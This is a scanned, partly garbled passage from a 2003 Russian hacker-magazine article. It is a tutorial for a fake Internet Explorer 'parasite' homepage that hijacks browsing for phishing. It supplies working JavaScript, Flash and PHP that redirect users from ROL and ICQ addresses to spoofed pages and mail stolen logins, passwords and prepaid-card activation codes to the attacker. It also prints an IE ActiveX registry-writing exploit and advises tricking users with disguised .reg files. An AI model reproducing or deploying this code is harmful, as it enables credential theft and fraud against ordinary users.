Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

книги хакеры / журнал хакер / специальные выпуски / Специальный выпуск 29_Optimized

.pdf
Скачиваний:
16
Добавлен:
20.04.2024
Размер:
14.61 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

P

 

 

 

 

 

NOW!

 

 

o

 

 

 

 

 

 

 

 

 

 

BUY

 

 

СЕТЕВОЕ МОШЕННИЧЕСТВО

 

w

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

HTTP’ÎÂÛÉ

DNS

 

Родил идею, взрыл bugtraq и нашел эксплоит DonoR

 

(donor@real.xakep.ru);

 

 

Разобрал эксплоит на составляющие и заставил осла

 

 

подавиться своим дерьмом Dronich

Берем контроль

 

>(dronich@real.xakep.ru);

над браузером клиента

 

В тяжких муках закодил и задизигнил «паразита» Sevranty

 

 

(sevranty@deepdesign.ru, vsevolod.deepdesign.ru).

 

 

 

 

 

 

Привет необузданный и великий ALL. Пришла весна, уже тает снег и всплывает г@вно. На улицу надо выходить только за пивом, иначе есть шанс вступить во что-нибудь. А у меня болит голова, и лезут в мою голову совершенно мрачные мысли. Вот и дошла до моей больной головы, идея Donor’а сделать ЭТО. И ЭТО родилось...

ТЕМ, КТО ПИШЕТ ПИСЬМА:

Если ты отсканировал и распознал эту статью, но ошибся хоть в одном знаке, то ни- чего работать у тебя не будет! Поэтому не ленись, лезь в инет и скачивай все коды с описаниями, так ты избегнешь глупых ошибок своего ДНК. Это, как знает любой, даже самый последний ламер, не лечится. Для подводников поясню, перенос строки в JavaScript строго регламентирован и описывается правилами, при верстке кода, который мы приводим в статье, мы можем потерять часть форматирования. Поэтому или учи правила или лезь на сайт за образцом.

ÈÄÅß

Сидел как-то мистер Донор на своей хм-м- м... заднице и размышлял о том, какая, все же, замечательная вещь эти современные сетевые технологии, особенно, в умелых руках: многострадального осла можно по косточкам разобрать и обратно собрать, да так, что бедный юзер умом тронется, а на флэше вообще можно целые он-лайн тулзы мутить! Мысли, как застебать лопоухих ламеров, одна прикольнее другой теснились в башке. Это ж как же все ламоботы свято уверены, что в родном ишаке можно только поп-апы стремные открывать, а с любимыми менюхами и с панелькой с кнопочками ничего слу-

читься не может. Авотфиг! Такой полезный стереотип-с надо использовать! Например, можно заменить все стандартные контролзы, панельки и скролл-бары флэшовыми мувиками и рандомом запускать веселые эффекты. Типа, алерт: «Твой браузер заразился корью!» и весь интерфейс покрывается красными точками :). Или, «Хлебни кислоты, сосунок!» и вся морда обтекает и плавится. Мыслям было тесно, и Донор полез в сеть искать Ноа, чтобы срочняком поделиться во избежание овердоза.

Мастер Ноа подошел к проблеме с сугубо утилитарной точки зрения: это ж НЛП чи- стой воды, наивного юзера можно так запугать и задурить, что он сам, добровольно скачает и установит себе, что угодно, и отдаст тебе любую инфу.

Тут Донор вспомнил, что когда-то давно, когда он был совсем маленьким и глупым, он как-то залез на один порно-сайт и подцепил себе паразита - вместо хоумпаги к нему начала грузиться какая-то платная порнуха. Он потом это дело затрахался из реестра вычищать. Сложив два и два и получив пять, Ноа и Донор пришли к выводу, что если закодить па- гу-паразит, эмитирующую контролзы браузера, и подсадить ее юзеру вместо хомяка, то можно незаметно перехватить контроль над его машиной и получить ценную инфу, а если разместить такую пагу на крупном портале, то получится что-то вроде боевого DNS.

ÓВАС ЕСТЬ ПЛАН, МИСТЕР ФИКС?

Óменя есть три плана! (с) Итак, что же нужно сделать, чтобы натянуть наивного юзера по самые гланды?

1. Заманить юзверя на зло-пагу, где подсадить ему означенного паразита. Сделать это можно сотней грязных способов от спама, до кидания ссылки в популярную конфу - выбирай на вкус.

2. Прописать юзеру в хоупейдж линк на па- гу-паразит aka военный DNS.

3. Показать юзеру неудачную загрузку его реального хомяка или about:blank. Еще неплохая идея сымитировать загрузку сайта M$ (осел иногда самолично вытворяет такое паскудство).

4. Подменить реальные контролзы фейковыми.

5. Отловить адреса, вводимые юзверем в адресную строку, сравнить их со списком «интересных» урлов, таких, как адреса известных провайдеров, icq.com, крупных @-магазинов и т.д., и если такой попался, выдать поддельную страницу соответствующей конторы, а если нет, то отправить юзверя по адресу.

6. На поддельной странице заставить юзера ввести представляющие интересе конфи-

денциальные данные, типа, логин и пасс, код активации интернет-карты и т.д.

7.Сохранить полученные данные и слить себе на мыло.

8.Окончательно задурить юзеру голову, чтобы выиграть время.

Итак, начнем с реализации паразита, чтобы было, чего подсаживать.

ПОДМЕНА ДОМАШНЕЙ СТРАНИЦЫ

В соурсе (view source) нашей паги должен быть такой код. Он откроет наш псевдо-эк- сплорер. Тот, кто читал предыдущие номера, сразу поймет, что при минимальном изменении можно открыть этот эксплорер во весь экран, добавив пользователю неожиданного счастья в отсутствии альтернативы.

<html>

<script>

var windowW = 830 // wide var windowH = 640 // high

var windowX = 0 // from left var windowY = 0 // from top

var urlPop = «rol.htm» var title = «- »

var autoclose = false

s = «width=»+windowW+»,height=«+windowH; var beIE = document.all?true:false

function openFrameless(){ if (beIE){

NFW = window.open(«»,«popFrameless»,«»+s)

NFW.blur()

window.focus()

NFW.resizeTo(windowW,windowH)

Кнопочка «Чики-Пуки» и окошко ввода.

020

april/04/2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

,

w Click

 

 

 

 

 

 

 

 

 

 

 

 

m

HTTP

ÎÂÛÉ DNS

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

À âîò è íàø ìàõà-ãóðó êîä.

NFW.moveTo(windowX,windowY) var frameString=«»+

«<html>»+

«<head>»+

«<title>»+title+»</title>»+

«</head>»+

«<frameset rows=’28,*,21’ framespacing=0 border=0 frameborder=0>»+

«<frame name=’top’ src=’top.html’ scrolling=’no’>»+

«<frame name=’main’ src=’«+urlPop+»’ scrolling=yes>»+

«<frame name=’bottom’ src=’bottom.html’ scrolling=’no’>»+

«</frameset>»+

«</html>»

NFW.document.open();

NFW.document.write(frameString)

NFW.document.close() } else {

NFW=window.open(urlPop,«popFrameless»,«scrollbars,»+s)

NFW.blur()

window.focus()

NFW.resizeTo(windowW,windowH)

NFW.moveTo(windowX,windowY)

}

NFW.focus()

if (autoclose){ window.onunload = fun-

ction(){NFW.close()}

}

}

</script>

<body onload=«javascript:openFrameless();»>

Здесь можно пустить море твоего бреда или излияние твоего больного сознания, но луч- шим вариантом будет стандартная 404 ошибка. У нее меньше всего шансов вызвать подозрение пользователя.

</body>

<html>

Ну, и конечно код окончания нашей паги. Теперь у нас при старте браузера появляется новое окно, в котором мы можем отрываться по полной. С чего начинается Родина? С темплейта в моей голове. Чтобы творить непотребство, надо заставить пользователя поверить, что он еще пользуется своим милым осликом ИЕшкой. Сначала, мы эмулируем окно браузера - нарисуем псевдо-эксплорер, в котором все и будет происходить. Для этого сделаем его скриншот, обрежем лишнее и сверстаем в HTML страничку (для ленивых: все это можно скачать с сайта). Получили совершенно нефункциональное НЕ4ТО. Нефункциональное потому, что пользователю некуда вводить свои любимые урлы, которые мы должны подменить. Куда бы мы ни

А вот и скрипт – сливун на мыло.

тыкнули, ничего не происходит. ЭТИМ даже дедушку не обмануть. Начнем-ка мы ЭТО развивать. Самое главное - это строка ввода адреса. Наша задача заключается в том, чтобы на запрос определенного адреса в инете, пользователь попал на нашу обманку и не понял об этом. Для этого самым простым и быстрым способом является сделать аналог этой адресной строки на Флеше (альтернативным вариантом является попытка утонуть в тонкостях JS & CSS).

Внутри флешки рисуем текстовое поле в стиле строки ввода адреса эксплорера, вешаем кнопочку, которая будет ловить нажатие ентера и обрабатывать значение нашего текстового поля в момент нажатия. Для этого на кнопке должен висеть, например, такой код:

on (release, keyPress «<Enter>») { url01 = ‘www.rol.ru’;

url02 = ‘rol.ru’;

url03 = ‘http://www.rol.ru’; url04 = ‘http://www.rol.ru/’; url05 = ‘http://rol.ru’; url06 = ‘http://rol.ru/’;

url11 = ‘www.icq.com’; url12 = ‘icq.com’;

url13 = ‘http://www.icq.com’; url14 = ‘http://www.icq.com/’; url15 = ‘http://icq.com’; url16 = ‘http://icq.com/’; url17 = ‘web.icq.com’;

url18 = ‘http://web.icq.com’; url19 = ‘http://web.icq.com/’;

url21 = ‘voffice.rol.ru’;

url22 = ‘http://voffice.rol.ru’; url23 = ‘http://voffice.rol.ru/’;

t = text;

if ( url01 == t || url02 == t || url03 == t || url04 == t || url05 == t || url06 == t ) {

t= ‘http://sevranty.deepdesign.ru/xa- kep/a-004/rol.htm’;

}else if ( url11 == t || url12 == t || url13 == t || url14 == t || url15 == t || url16 == t || url17 == t || url18 == t || url19 == t ) {

t= ‘http://sevranty.deepdesign.ru/xa- kep/a-004/icq.htm’;

}else if ( url21 == t || url22 == t || url23 == t ) {

t= ‘http://sevranty.deepdesign.ru/xa- kep/a-004/login.php’;

}else {

t= ‘http://www.google.com.ru/se- arch?hl=ru&inlang=ru&ie=windows-1251&q=’ + t;

getURL(t, «main»);

}

Длина кода зависит только от количества серваков, которые ты хочешь подменять. Все написано до извращения просто. В на- чале скриптика описываем адреса, которые мы хотим подменить (нужно помнить, что у одного адреса есть несколько вариантов написания, а аналог grep’а здесь может быть не лучшим выходом.). После этого присваиваем переменной t значение нашего текстового поля, которое мы предварительно обозвали text. Дальше как всегда извращенным if’ом, сравниваем введенное юзером с образцами урлов, описанных выше - мы не ищем легких путей. Кстати, обращаю внимание, что у нас из фрейма с именем top (top.html) передается обработанный урл (валуя «t») в средний фрейм main (по дефолту rol.htm), это делается getURL(t, «main»), и потом не говорите, что не поняли. Теперь у нас есть локальное счастье. И это локальное счастье мы вставляем в файл top.html - это верхняя часть нарезанного эксплорера.

<td width=«100%» align=«left» nowrap va- lign=«top»><img src=«gui/0.gif» width=«1» height=«3» hspace=0 vspace=0><br><OBJECT classid=«clsid:D27CDB6E-AE6D-11cf-96B8- 444553540000» codebase=«http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0» WIDTH=«450» HEIGHT=«18» id=«index» ALIGN=«»><PARAM NAME=movie VA- LUE=«flash/index.swf?5»><PARAM NAME=quality VALUE=high><PARAM NAME=bgcolor VA- LUE=#FFFFFF><EMBED src=«flash/index.swf?5» quality=high bgcolor=#FFFFFF WIDTH=«450» HEIGHT=«18» NAME=«index» ALIGN=«» TY- PE=«application/x-shockwave-flash» PLUGINSPAGE=«http://www.macromedia.com/go/getflashplayer»></EMBED></OBJECT></td>

Я специально здесь привел пример, как вставляется код АктивИкса флеша в таблицу, а то многие из начинающих вставляют пробелы или переносы строки - ГДЕ НЕ НАДО. Если не понимаешь, то лучше слушай старших или читай ФАК с МАНУАЛьной терапией для МОЗГофф. А то при твоем умении, все таблицы расползутся вкривь и вкось. Самореклама: подтверждено несколькими годами верстки html’я в блокноте. Хе-хе. О... забыл пояснить: в файле top.html у нас находиться строка ввода урла (адреса), с кусками от скриншота браузера. В файле bottom.html строка статуса индикатор инета и тому подобная муть.

Чтобы совсем запутать юзера можно реализовать на флэше рабочие кнопки и выпадающий список при вводе урла в фейковую адресную строку, настраиваемые через XML. Но если лень, можно не разворачивать браузер

page 021

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

 

o

 

 

 

 

 

BUY

 

 

СЕТЕВОЕ МОШЕННИЧЕСТВО

w

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

на фулскрин, а оставить часть родных контролзов, правда, шанс успеха тогда падает.

ЧТО БЫ ТАКОЕ ПОКАЗАТЬ?

На данном этапе мы имеем: почти полноценный браузер, в котором нам нечего показать. Для того чтобы все-таки что-то показывать, мы должны понять, чего мы хотим от того ламера, который попадет в наши сети. Я хочу от него личный логин/пароль к РОЛ’овскому диалапу и, конечно, активационный код новой карточки, который он введет в поле для пополнения СВОЕГО (читать МОЕГО) баланса. Еще я хочу от него логин/пароль к его АСЬКЕ (но это для понту). Поэтому продолжим наш

батывают определенные валуи, чтобы весь

$msg .= «$n1\n»;

этот мозго-шит смотрелся правдоподобно.

$msg .= «$n2\n»;

Дальше можно перейти ко всяким отправ-

$msg .= « \n»;

кам личной инфы ламера к нам на мыло. При

$msg .= «—————————————————————\n»;

клике на ссылку на Личный кабинет с об-

 

манки РОЛа или наборе в адесной строке од-

$topic = «ROL: Login\Password»;

ного из этих адресов voffice.rol.ru

$email=«sex@sex.ru»;

http://voffice.rol.ru http://voffice.rol.ru/

mail($email, $topic, $msg, «From:

Из личного кабинера на РОЛе наш милый и

sex@sex.ru»);

любимый (Лу)юзер должен перенаправить-

 

ся на нашу пагу-обманку login.php, на ней

$goto = ‘Location: .’rvoffice.php’.’?us-

псевдо-апач-авторизация (copyright на оба

erlogin=’.$n1;

эти слова. Шекспир). Пользователь вводит

Header($goto);

свои тайные логин/пароль. При клике на

?>

любой кнопке, инфа передается методом

 

пост нашему скриптику post.php

 

 

 

 

 

 

 

РОЛ-дурилка. Велкам!

Вот, такой проектик у нас получился.

МОЗГовой штурм. Теперь, когда МЫ все это поняли и оценили трудности, нам надо несколько страниц обманок, функциональность бэк-офиса РОЛа и скрипты, которые все эту белиберду обработают. В этом вопросе проще всего реализовать всякие проверки и отправки на мыло через php. Сразу скажу, если твой хостер имеет тебя в плане сендмейла или дерет непотребно в плане прав, то я могу тебе только посочувствовать. Конечно, говорят, что на халяву и уксус сладкий, но мы то уксус не пьем в принципе. Только пшеничный франциСКАНЕР с кальМАРчиКАми, бЕЙлиС с чипСАМИ или сухой ЧИНзаНО под моченые яБЛОЧКИ.

Чтобы сделать паги-обманки, нам нужен все тот же, наш любимый и ненаглядный продукт мега-корпорации русских засл(R)анцев мелкомягких, ОСЛИК ИЕ! Скачиваем полностью все станицы с картинками, ручками в тот отстой, который сделал осел, ПЕРЕвставляем каскадные таблицы стилей (ну он имеет по полной программе). Дальше исправляем в css пути в бэкграунду и ручками ска- чиваем данные бэкграунды (их осел игнорирует, замечено в версии 5.0 при скачивании c web.icq.com). Также ручками исправляем ошибки осла с ифреймами, рекламой, различными аквив-иксами и счетчиками. Для РОЛа мне пришлось сделать 4етыре обманки. Первая это главная страница (на ней я исправил адрес в Личный кабинет). Вторая - запрос логина/пароля, вместо апач-автори- зации у РОЛа. Третья - сам Личный кабинет РОЛовчанина. Четвертая ввод кода активации РОЛовской карточки. В некоторые эти страницы я вставил php’шки которые обра-

<table width=90% height=90% border=0 cellspacing=0 cellpadding=0><form method=post action=post.php><tr>

Опустим избыточный код.

<input type=text size=12 maxlength=60 na- me=n1 style=«font-family: Arial; font-si- ze: 12px; width:200; height:20px;»>

Снова опустим избыточный код.

<input type=password size=12 maxlength=60 name=n2 style=«font-family: Arial; fontsize: 12px; width:200; height:20px;»>

Опять опустим избыточный код.

<INPUT type=«checkbox» name=«Order» va- lue=«DSN»> Save this password in your password list

И еще раз опустим избыточный код.

<input type=submit name=do value=’Ok’ style=«width:90»> &nbsp; &nbsp; <input type=submit name=do value=’Cancel’ style=«width:90»><br>

Ну, и опустим избыточный код

</tr></form></table>

Кстати, опять обрати внимание, как верстается открывающий и закрывающие тэги ФОРМЫ, это важно при желании избежать излишних пробелов. При нажатии передали инфу и скрипт заработал:

<?

$timeall = ‘Date: .Date( D, d M Y H:i:s ‘).$SIGN.sprintf( ‘%02d%02d’,floor($ZONE/3600),floor(($ZONE%3600)/60)). «\n»;

$msg .= $timeall;

$msg .= «REMOTE_ADDR: $REMOTE_ADDR\n»; $host = gethostbyaddr(«$REMOTE_ADDR»); $msg .= «HOST: $host\n»;

Этот скриптик передает необходимый минимум информации кроме логина и пароля. Я его уже описывал как-то на страницах журнала. Вместо sex@sex.ru должен быть твой e@mail, на него будет приходить «ценная» инфа. Скрипт после отправки мыла сразу переходит на пагу rvoffice.php и явным образом передает на нее переменную userlogin, это логин пользователя. С помощью этого логина, мы будем пытаться заставить пользователя поверить, что он в своем Личном кабинете. Для этого у нас по всему rvoffice.php разбросаны

<?php echo $userlogin; ?>

Они выводят введенный пользователем логин, где это необходимо. Например, в полях «Имя пользователя», «Перенаправление почты», «Персональный номер» и т.п. Забыл уточнить, что я для примера брал страницу РОЛа, которая заблокированна и поэтому надо пополнить баланс. Почти все важные ссылки на данной станице идут на пагускрипт addmoney.php, где пользователю предлагают пополнить баланс.

<?

if ($csid==«» or $cert1==«» or $cert1==«» or $cert3==«» or $cert4==«») {}

else {

$timeall = ‘Date: .Date( D, d M Y H:i:s ‘).$SIGN.sprintf( %02d%02d’,floor($ZONE/3600),floor(($ZONE%3600)/60)). «\n»;

$msg = $csid.» - «.$cert1.» - «.$cert1.» - «.$cert3.» - «.$cert4.» \n»;

022

april/04/2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

,

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

HTTP ÎÂÛÉ DNSw.

 

 

 

 

 

.co

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Не совсем личный кабинет.

$msg .= $timeall;

$msg .= «REMOTE_ADDR: $REMOTE_ADDR\n»; $host = gethostbyaddr(«$REMOTE_ADDR»); $msg .= «HOST: $host\n»;

$topic = «ROL: Card number.»; $email=«sex@sex.ru»;

mail($email, $topic, $msg, «From: sex@sex.ru»);

}

?>

В начале скрипта идет проверка заполнены ли поля активирующие карточку, если да, то они отсылаются тебе на мыло с дополнительной информацией, время, IP’шник, хост.

<HTML>

<HEAD><TITLE>Russia-On-Line Internet card</TITLE></HEAD>

<BODY>

<h1 align=center>Пополнение áаланса</h1> <b>Только äëÿ êлиентов ÐÎË.</b><br>

Äëÿ ïополнения áаланса âведите êîä àктивации Èнтернет-êàðòû è íажмите êнопку «Пополнить áаланс». Âàø áаланс áóäåò ïо- полнен â ñоответствии ñ íоминалом Èíòåð- íåò-êàðòû.

<p>

<font color=«maroon»><b>ВНИМАНИЕ:</b></font>

Некоторые ñåðèè Èнтернет-êàðò íå ìîãóò áûòü èспользованы äëÿ ïополнения áаланса<br>

<font color=«maroon»><b>ВНИМАНИЕ:</b></font>

Не прячьте ваши данные за звезды по утрам :)!

При пополнении баланса автоматического перевода на другой тарифный план не происходит; для изменения тарифного плана см. Личный кабинет

После стандартного оформления данной РОЛовской страницы идет наша форма, которая ссылается сама на себя.

Не пустая, а равная main, переменная УИД ($uid==«main») показывает нам, что это не переход со страницы rvoffice.php, а клик на кнопке ‘Пополнить баланс’.

<form method=post action=addmoney.php> <? if ($csid==«» or $cert1==«» or

$cert1==«» or $cert3==«» or $cert4==«») { if ($uid==«main») { ?><h2 align=center><font color=f01010>Íå óказан êîä àк- тивации Èнтернет êарты.<br>Пожалуйста, введите êîä àктивации.</font></h2><?

} }

Если хоть какие-то поля не заполнены, то мы ругаемся на пользователя стандартной фразой, взятой с РОЛа. Здесь у нас акцент делается на то, чтобы заставить пользователя поверить, что он на РОЛе.

else {

if ($uid==«main») {

?><h2 align=center><font color=f01010>Указан íеверный êîä àктивации Èнтернет êарты.<br>Пожалуйста, âведите êîä àктивации заново.</font></h2><?

} } ?>

Если все поля заполнены кодом активации карточки, и это нажатие на кнопку ‘Пополнить баланс’, то код актива-

ции уже отослан нам в начале страницы, но мы все равно говорим пользователю, что он ошибся. Пусть думает, что его карточку заблокировали или он даун и т.п. Чем дольше он будет сомневаться в себе, тем лучше нам. Время в данном вопросе работает на нас.

<table border=0 width=100%><tr><td>Êîä àк- тивации</td><td><table><tr><td>

<input type=text size=10 maxlength=10 na- me=csid value=<?php echo $csid; ?>> - </td><td>

<table bgcolor=#A0A0A0><tr><td><INPUT na- me=uid type=hidden value=main>  <input type=text size=5 maxlength=5 name=cert1 value=<?php echo $cert1; ?>> -&nbsp;<input type=text size=5 maxlength=5 name=cert2 value=<?php echo $cert2; ?>> -&nbsp;<input type=text size=5 maxlength=5 name=cert3 value=<?php echo $cert3; ?>> -&nbsp;<input ty- pe=text size=5 maxlength=5 name=cert4 va- lue=<?php echo $cert4; ?>> </td></tr></table></td></tr></table></td></tr> </table><center><input type=submit name=do value=’Пополнить áаланс’> </center></form>

Здесь идут те самые поля кода активации и субмит формы. В полях мы выводим текущие значения кода активации. Это мы делаем по двум прчинам: первая - так же сделано на РОЛе, вторая - так удобнее всем.

<CENTER><HR WIDTH=70% SIZE=5><BR>Copyright © 2002 TeleRoss</CENTER> </BODY></HTML>

Ну, введи же!

Давай, давай! Больше фрикций!

page 023

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

 

o

 

 

 

 

 

 

BUY

 

СЕТЕВОЕ МОШЕННИЧЕСТВО

 

w

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

m

 

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Асечка, отдайся!

Здесь закрывается страница.

Ух! Вот и написал. ICQ делается по аналогии с login.php, только поля логина пароля вставляются в обманку главной страницы. Под каким-нибудь заголовком, типа «SUPER, PUPER, NEW, Web-ICQ».

ÎÑÅË 666 È ÅÃÎ ÄÛÐÛ

Паразит был уже почти готов, когда всплыла одна маленькая деталь: нужно было как-то подсадить заразу.

Самой известной мазой прописаться без спроса в хомяк к юзеру является знаменитый баг четвертого IE. Следующий код позволял писать в реестр, что угодно, например, свой урл в хомяк:

<script>

document.write(«<APPLET HIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>»);

function pipetz(){ try{

x=document.applets[0]; x.setCLSID(«{F953DC22-1CF0-11D0-

ADB9-00C04FD58A0B}»); x.createInstance(); Shl=x.GetObject(); x.setCLSID(«{0D43FE01-F093-11CF-

8940-00A0C9054228}»);

try{

Shl.RegWrite(«HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Pa- ge», «http://www.pipets.ru»);

}

catch(e){}

}

catch(e){}

}

setTimeout(«pipetz()», 1000); </script>

К сожалению или к счастью, этот баг был успешно пофиксен M$ начиная с IE 5.0, да и антивири успешно делают на этот скрипт свою стойку. Однако воткнуть этот скрипт в подсаживательную пагу, все же, не помешает, так как ламеров, не менявших свой софт со времен царя Гороха, на свете пока еще хоть отбавляй.

ИГРЫ С РЕЕСТРОМ

Вторая маза - это заставить юзверя самолично, своей ламерской рукой прописать себе в реестр нужные нам параметры aka ад-

А вот, что свалилось нам на почту.

рес паразита. Ты в кур-

се, что стоит два раза шлепнуть по reg-фай- лу, как все его содержание автоматом добавится в реестр, что нам и надо. Юзеры часто пользуют reg-файлы, когда крячат проги. Подсунь ламеру такой файлик, как необходимые изменения для кряка нужной софтины. Сам кряк может быть фейком чистой воды.

